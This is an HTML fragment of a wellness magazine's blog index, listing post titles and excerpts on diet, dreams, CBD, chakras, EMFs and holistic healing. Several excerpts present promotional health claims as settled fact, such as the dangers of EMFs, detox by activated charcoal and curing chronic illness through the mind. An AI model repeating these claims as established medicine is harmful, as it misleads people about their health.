href=https://www.consciouslifestylemag.com/category/mind/>Mind</a></div><h3><a href=https://www.consciouslifestylemag.com/migraine-diet-foods-to-prevent-headaches/>The Migraine Diet: What Foods to Eat and Avoid to Prevent Headaches</a></h3><div class=blog-item-details>By Conscious Lifestyle on March 30, 2019</div><div class=excerpt>The migraine diet is based on over 25 years of scientific research and outlines the specific foods you need to eat and avoid to prevent headaches.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/migraine-diet-foods-to-prevent-headaches/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/migraine-diet-foods-to-prevent-headaches/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16008 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>24</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/grow-a-new-body/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/grow-a-new-body-girl-flowers-surreal-thumbnail-290x193.jpg width=290 height=193 alt="Growing A New Body: How To Completely Restore Your Health And Well-Being At Any Age"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a><a class=cat-item style=background-color:#00bf25; href=https://www.consciouslifestylemag.com/category/superfoods/>Superfoods</a></div><h3><a href=https://www.consciouslifestylemag.com/grow-a-new-body/>Growing A New Body: How To Completely Restore Your Health And Well-Being At Any Age</a></h3><div class=blog-item-details>By Conscious Lifestyle on March 14, 2019</div><div class=excerpt>Medical anthropologist Alberto Villoldo, Ph.D. shares cutting edge insights into the practices and diet that will help you repair every aspect of your health and vitality at any age.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/grow-a-new-body/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/grow-a-new-body/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16343 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>17</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/types-of-dreams-and-what-they-mean/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/types-of-dreams-what-they-mean-man-surreal-ocean-thumbnail-290x196.jpg width=290 height=196 alt="Solving the Mystery: The 5 Types of Dreams and What They Mean"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#6fc8c2; href=https://www.consciouslifestylemag.com/category/mind/>Mind</a><a class=cat-item style=background-color:#1cc3ff; href=https://www.consciouslifestylemag.com/category/mindfulness/>Mindfulness</a><a class=cat-item style=background-color:#000f75; href=https://www.consciouslifestylemag.com/category/without-limits/>Without Limits</a></div><h3><a href=https://www.consciouslifestylemag.com/types-of-dreams-and-what-they-mean/>Solving the Mystery: The 5 Types of Dreams and What They Mean</a></h3><div class=blog-item-details>By Conscious Lifestyle on March 14, 2019</div><div class=excerpt>Understanding the type of dream you are having is essential to figuring out what they ultimately mean. Use this in-depth guide to solve the mystery once and for all.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/types-of-dreams-and-what-they-mean/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/types-of-dreams-and-what-they-mean/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16262 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>24</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/rythmia-travel-guide-miracle/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/Rythmia-Life-Advancement-Center-thumbnail-290x193.jpg width=290 height=193 alt="My Journey to Rythmia Life Advancement Center: The Land of Miracles"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#9df1ba; href=https://www.consciouslifestylemag.com/category/conscious-travel/>Conscious Travel</a><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a></div><h3><a href=https://www.consciouslifestylemag.com/rythmia-travel-guide-miracle/>My Journey to Rythmia Life Advancement Center: The Land of Miracles</a></h3><div class=blog-item-details>By Conscious Lifestyle on March 7, 2019</div><div class=excerpt>If you are looking to make a quantum leap in your personal and spiritual growth, then Rythmia may be the place for you. Here&#8217;s all the details of what I experienced there:</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/rythmia-travel-guide-miracle/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/rythmia-travel-guide-miracle/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16271 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>8</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/spring-2019-issue-out-now/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/Issue-022-Cover-Thumbnail-290x171.jpg width=290 height=171 alt="Spring 2019 Issue Out Now"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#66d7f0; href=https://www.consciouslifestylemag.com/category/back-issues/>Back Issues</a></div><h3><a href=https://www.consciouslifestylemag.com/spring-2019-issue-out-now/>Spring 2019 Issue Out Now</a></h3><div class=blog-item-details>By Conscious Lifestyle on March 3, 2019</div><div class=excerpt>Feature articles: The Keys to Longevity, Creating Your Desired Reality, The Keys to Self Healing, Rythmia: The Land of Miracles, Mastering Your Mind Power and more.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/spring-2019-issue-out-now/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/spring-2019-issue-out-now/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16240 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>16</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/mindful-open-awareness-meditation/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/02/man-sitting-mindful-open-awareness-meditation-nature-thumbnail-2-290x193.jpg width=290 height=193 alt="The Mindful Open Awareness Meditation: 5 Minutes to a Happier, Calmer You"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#63d1ff; href=https://www.consciouslifestylemag.com/category/meditation/>Meditation</a><a class=cat-item style=background-color:#6fc8c2; href=https://www.consciouslifestylemag.com/category/mind/>Mind</a><a class=cat-item style=background-color:#1cc3ff; href=https://www.consciouslifestylemag.com/category/mindfulness/>Mindfulness</a></div><h3><a href=https://www.consciouslifestylemag.com/mindful-open-awareness-meditation/>The Mindful Open Awareness Meditation: 5 Minutes to a Happier, Calmer You</a></h3><div class=blog-item-details>By Conscious Lifestyle on February 11, 2019</div><div class=excerpt>You can massively increase your levels of happiness and inner peace in just 5 min per day by consistently practicing the mindful open awareness meditation. Here&#8217;s how:</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/mindful-open-awareness-meditation/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/mindful-open-awareness-meditation/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16105 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>24</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/fomo-bones-dog-anxiety/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/01/FOMO-Bones-for-Doggy-Anxiety-Couch-thumbnail-290x193.jpg width=290 height=193 alt="Dealing With Doggy Anxiety: How to Calm Your Pup Naturally When They&#8217;re Feeling Stressed Out"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a><a class=cat-item style=background-color:#00bf25; href=https://www.consciouslifestylemag.com/category/superfoods/>Superfoods</a></div><h3><a href=https://www.consciouslifestylemag.com/fomo-bones-dog-anxiety/>Dealing With Doggy Anxiety: How to Calm Your Pup Naturally When They&#8217;re Feeling Stressed Out</a></h3><div class=blog-item-details>By Conscious Lifestyle on January 31, 2019</div><div class=excerpt>Dogs get anxious just like humans. Whether its when you leave the house or they encounter something they don&#8217;t like, learn natural ways to help them through it.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/fomo-bones-dog-anxiety/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/fomo-bones-dog-anxiety/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16131 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>17</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/harmful-chemicals-in-cosmetics-to-avoid/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/01/harmful-chemicals-and-toxins-for-the-skin-girl-smiling-thumbnail-290x193.jpg width=290 height=193 alt="15 Harmful Chemicals Hiding in Cosmetics and Beauty Products to Avoid Putting on Your Skin at All Costs"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#f08e73; href=https://www.consciouslifestylemag.com/category/body/>Body</a><a class=cat-item style=background-color:#28b65b; href=https://www.consciouslifestylemag.com/category/eco/>Eco</a><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a></div><h3><a href=https://www.consciouslifestylemag.com/harmful-chemicals-in-cosmetics-to-avoid/>15 Harmful Chemicals Hiding in Cosmetics and Beauty Products to Avoid Putting on Your Skin at All Costs</a></h3><div class=blog-item-details>By Conscious Lifestyle on January 28, 2019</div><div class=excerpt>There are harmful chemicals and toxins hidden in most skincare products that you should absolutely be avoiding if you care about your health. Here are the worst 15 and what to replace them with.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/harmful-chemicals-in-cosmetics-to-avoid/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/harmful-chemicals-in-cosmetics-to-avoid/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16107 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>23</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/how-to-be-happy-feel-good/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/12/how-to-be-happy-and-feel-good-woman-smiling-thumbnail-290x193.jpg width=290 height=193 alt="How to Be Happy: 10 Scientifically Proven Keys to Feeling Good All the Time"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#6fc8c2; href=https://www.consciouslifestylemag.com/category/mind/>Mind</a><a class=cat-item style=background-color:#1cc3ff; href=https://www.consciouslifestylemag.com/category/mindfulness/>Mindfulness</a><a class=cat-item style=background-color:#ceecef; href=https://www.consciouslifestylemag.com/category/spirituality/>Spirituality</a></div><h3><a href=https://www.consciouslifestylemag.com/how-to-be-happy-feel-good/>How to Be Happy: 10 Scientifically Proven Keys to Feeling Good All the Time</a></h3><div class=blog-item-details>By Conscious Lifestyle on December 25, 2018</div><div class=excerpt>Positive psychology researchers have cracked the code on how to be happy and in this article you&#8217;ll learn the top 10 ways they have discovered to feel good all the time.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/how-to-be-happy-feel-good/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/how-to-be-happy-feel-good/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16019 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>9</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/sunday-scaries-cbd-anxiety/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/12/Sunday-Scaries-CBD-Gummies-thumbnail-290x192.jpg width=290 height=192 alt="Stop Anxiety in Its Tracks with CBD: The Natural Remedy for Anxiety that Actually Works"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a></div><h3><a href=https://www.consciouslifestylemag.com/sunday-scaries-cbd-anxiety/>Stop Anxiety in Its Tracks with CBD: The Natural Remedy for Anxiety that Actually Works</a></h3><div class=blog-item-details>By Conscious Lifestyle on December 18, 2018</div><div class=excerpt>Forget everything you&#8217;ve tried in the past, there&#8217;s a new kid on the block for natural anxiety relief and it works powerfully and fast, without making you drowsy or tired.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/sunday-scaries-cbd-anxiety/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/sunday-scaries-cbd-anxiety/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16056 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>17</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/serpentfire-devany-amber-wolfe-art/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/12/Sun-Worship-thumbnail-290x193.jpg width=290 height=193 alt="Cosmic Dreams: The Art of Devany Amber Wolfe"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#ffe1ab; href=https://www.consciouslifestylemag.com/category/art/>Art</a><a class=cat-item style=background-color:#00d6a9; href=https://www.consciouslifestylemag.com/category/conscious-culture/>Conscious Culture</a></div><h3><a href=https://www.consciouslifestylemag.com/serpentfire-devany-amber-wolfe-art/>Cosmic Dreams: The Art of Devany Amber Wolfe</a></h3><div class=blog-item-details>By Conscious Lifestyle on December 10, 2018</div><div class=excerpt>Artist Devany Amber Wolfe combines symbolic and esoteric imagery with distinctly feminine forms to create cosmic dreamscapes that invoke the most mystical aspects of our psyche and soul.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/serpentfire-devany-amber-wolfe-art/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/serpentfire-devany-amber-wolfe-art/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16021 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>16</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/faire-shop/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/11/vote-with-your-wallet-faire-shop-thumbnail-290x193.jpg width=290 height=193 alt="How to Save the Planet While You Shop: Discover the World’s Top Online Marketplace for Sustainable, Fair Trade Goods"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#00d6a9; href=https://www.consciouslifestylemag.com/category/conscious-culture/>Conscious Culture</a><a class=cat-item style=background-color:#28b65b; href=https://www.consciouslifestylemag.com/category/eco/>Eco</a><a class=cat-item style=background-color:#ffaca4; href=https://www.consciouslifestylemag.com/category/humanitarianism/>Humanitarianism</a></div><h3><a href=https://www.consciouslifestylemag.com/faire-shop/>How to Save the Planet While You Shop: Discover the World’s Top Online Marketplace for Sustainable, Fair Trade Goods</a></h3><div class=blog-item-details>By Conscious Lifestyle on November 22, 2018</div><div class=excerpt>Learn how you can make a major positive impact on the health and wellbeing of the planet, humanity and all life by voting with your dollar when you shop.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/faire-shop/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/faire-shop/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=15999 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>17</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/winter-2019-issue-out-now/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/11/Issue-021-Cover-Thumbnail-290x171.jpg width=290 height=171 alt="Winter 2019 Issue Out Now"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#66d7f0; href=https://www.consciouslifestylemag.com/category/back-issues/>Back Issues</a></div><h3><a href=https://www.consciouslifestylemag.com/winter-2019-issue-out-now/>Winter 2019 Issue Out Now</a></h3><div class=blog-item-details>By Conscious Lifestyle on November 19, 2018</div><div class=excerpt>Feature articles: Cleaning Up Your Genes, Healing Mushrooms: Medicinal Marvels, The Enlightened Brain, Inner Alchemy: A Taoist Path to Well-Being, The Keys to Self Love and more&#8230;</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/winter-2019-issue-out-now/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/winter-2019-issue-out-now/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=15991 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>16</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/activated-charcoal-benefits/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/10/activated-charcoal-powder-splash-background-thumbnail-290x193.jpg width=290 height=193 alt="12 Incredible Uses and Health Benefits of Activated Charcoal Powder: The Great Purifier"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a><a class=cat-item style=background-color:#00bf25; href=https://www.consciouslifestylemag.com/category/superfoods/>Superfoods</a></div><h3><a href=https://www.consciouslifestylemag.com/activated-charcoal-benefits/>12 Incredible Uses and Health Benefits of Activated Charcoal Powder: The Great Purifier</a></h3><div class=blog-item-details>By Conscious Lifestyle on October 28, 2018</div><div class=excerpt>From whitening your teeth to detoxifying your body and far more, learn about all of the incredible uses and benefits of activated charcoal powder.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/activated-charcoal-benefits/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/activated-charcoal-benefits/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=15947 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>10</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/pregnancy-diet-healthy-foods-for-women/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/10/healthy-diet-pregnant-woman-motherhood-thumbnail-290x193.jpg width=290 height=193 alt="The Natural Pregnancy Diet: What Foods to Eat and Avoid for a Healthy Baby"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#f08e73; href=https://www.consciouslifestylemag.com/category/body/>Body</a><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a></div><h3><a href=https://www.consciouslifestylemag.com/pregnancy-diet-healthy-foods-for-women/>The Natural Pregnancy Diet: What Foods to Eat and Avoid for a Healthy Baby</a></h3><div class=blog-item-details>By Conscious Lifestyle on October 16, 2018</div><div class=excerpt>Learn what foods to eat during pregnancy, what to avoid and what general dietary guidelines will ensure you have a healthy baby at the end of 9 months.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/pregnancy-diet-healthy-foods-for-women/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/pregnancy-diet-healthy-foods-for-women/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=15867 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>24</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/yoga-in-schools-bent-on-learning/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/09/bent-on-learning-yoga-in-schools-thumbnail-290x193.jpg width=290 height=193 alt="Careers With Soul: Help Make a Positive Impact on the World Teaching Yoga and Mindfulness in Schools"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#f08e73; href=https://www.consciouslifestylemag.com/category/body/>Body</a><a class=cat-item style=background-color:#1cc3ff; href=https://www.consciouslifestylemag.com/category/mindfulness/>Mindfulness</a><a class=cat-item style=background-color:#; href=https://www.consciouslifestylemag.com/category/yoga/>Yoga</a></div><h3><a href=https://www.consciouslifestylemag.com/yoga-in-schools-bent-on-learning/>Careers With Soul: Help Make a Positive Impact on the World Teaching Yoga and Mindfulness in Schools</a></h3><div class=blog-item-details>By Conscious Lifestyle on September 20, 2018</div><div class=excerpt>Do you dream of having a soulful, purpose filled career helping to create positive change in the world? Then look no further than teaching yoga + mindfulness in schools.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/yoga-in-schools-bent-on-learning/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/yoga-in-schools-bent-on-learning/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=15809 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>17</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/emf-dangers-health-effects-radiation/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/08/emf-dangers-radiation-electricity-thumbnail-290x193.jpg width=290 height=193 alt="The Health Effects of EMFs: How to Protect Yourself From the Dangers of Electromagnetic Radiation"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#28b65b; href=https://www.consciouslifestylemag.com/category/eco/>Eco</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a><a class=cat-item style=background-color:#000f75; href=https://www.consciouslifestylemag.com/category/without-limits/>Without Limits</a></div><h3><a href=https://www.consciouslifestylemag.com/emf-dangers-health-effects-radiation/>The Health Effects of EMFs: How to Protect Yourself From the Dangers of Electromagnetic Radiation</a></h3><div class=blog-item-details>By Conscious Lifestyle on September 6, 2018</div><div class=excerpt>Learn all about the dangers of EMFs, the science that shows this is the case and how to reduce the negative health effects of electromagnetic radiation.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/emf-dangers-health-effects-radiation/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/emf-dangers-health-effects-radiation/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=15766 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>23</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/fall-2018-issue-out-now/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/09/Issue-020-Cover-Thumbnail-290x171.jpg width=290 height=171 alt="Fall 2018 Issue Out Now"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#66d7f0; href=https://www.consciouslifestylemag.com/category/back-issues/>Back Issues</a></div><h3><a href=https://www.consciouslifestylemag.com/fall-2018-issue-out-now/>Fall 2018 Issue Out Now</a></h3><div class=blog-item-details>By Conscious Lifestyle on September 4, 2018</div><div class=excerpt>Feature articles: The Art of Amazing Sleep, Powering up Your Brain, The Happiness Toolbox, Decoding Your Dreams, The Age of Intuition, Mindful Relationship Habits, Expanded Realities and more&#8230;</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/fall-2018-issue-out-now/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/fall-2018-issue-out-now/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=15781 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>16</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/throat-chakra-vishuddha-healing/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/08/throat-chakra-woman-glowing-forrest-thumbnail-290x193.jpg width=290 height=193 alt="8 Powerful Ancient Practices for Supercharging and Healing Your Throat Chakra"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a><a class=cat-item style=background-color:#ceecef; href=https://www.consciouslifestylemag.com/category/spirituality/>Spirituality</a><a class=cat-item style=background-color:#000f75; href=https://www.consciouslifestylemag.com/category/without-limits/>Without Limits</a></div><h3><a href=https://www.consciouslifestylemag.com/throat-chakra-vishuddha-healing/>8 Powerful Ancient Practices for Supercharging and Healing Your Throat Chakra</a></h3><div class=blog-item-details>By Conscious Lifestyle on August 9, 2018</div><div class=excerpt>Learn powerful ancient practices for strengthening, opening and healing your throat chakra, known as Vishuddha, plus an overview of its functions, properties and powers.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/throat-chakra-vishuddha-healing/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/throat-chakra-vishuddha-healing/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=15729 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>23</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/mind-body-healing/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/08/mind-body-healing-woman-swimming-thumbnail-290x198.jpg width=290 height=198 alt="Healing From Within: The Keys to Curing Chronic Illnesses Through the Mind-Body Connection"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a><a class=cat-item style=background-color:#6fc8c2; href=https://www.consciouslifestylemag.com/category/mind/>Mind</a></div><h3><a href=https://www.consciouslifestylemag.com/mind-body-healing/>Healing From Within: The Keys to Curing Chronic Illnesses Through the Mind-Body Connection</a></h3><div class=blog-item-details>By Conscious Lifestyle on August 4, 2018</div><div class=excerpt>Deep research into the mind and body is revealing that there is a strong connection between our thoughts, emotions, healing and health.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/mind-body-healing/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/mind-body-healing/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=15645 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>24</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/limitless-living-save-the-planet/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/07/limitless-living-nature-big-sky-lake-thumbnail-290x193.jpg width=290 height=193 alt="Limitless Living: How to Save the Planet Through Innovation, Not Living With Less"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#; href=https://www.consciouslifestylemag.com/category/consciousness/>Consciousness</a><a class=cat-item style=background-color:#28b65b; href=https://www.consciouslifestylemag.com/category/eco/>Eco</a><a class=cat-item style=background-color:#ffaca4; href=https://www.consciouslifestylemag.com/category/humanitarianism/>Humanitarianism</a></div><h3><a href=https://www.consciouslifestylemag.com/limitless-living-save-the-planet/>Limitless Living: How to Save the Planet Through Innovation, Not Living With Less</a></h3><div class=blog-item-details>By Conscious Lifestyle on July 21, 2018</div><div class=excerpt>Saving the planet is not about living with less or sacrificing out standard of living—it&#8217;s about solving our problems creatively and living without limits.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/limitless-living-save-the-planet/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/limitless-living-save-the-planet/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=15649 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>23</span></div></div></div></div></li></ul><div class="pagination-wrap blog-pagination"><ul class=pagenavi><li><span class=current>1</span></li><li><a href="https://www.consciouslifestylemag.com?paged=2" class=single_page title=2>2</a></li><li><a href="https://www.consciouslifestylemag.com?paged=3" class=single_page title=3>3</a></li><li><a href="https://www.consciouslifestylemag.com?paged=4" class=single_page title=4>4</a></li><li><a href="https://www.consciouslifestylemag.com?paged=5" class=single_page title=5>5</a></li><li><span class=expand>...</span></li><li><a href="https://www.consciouslifestylemag.com?paged=14" class=last title="Last Page">14</a></li><li><a href="https://www.consciouslifestylemag.com?paged=2" 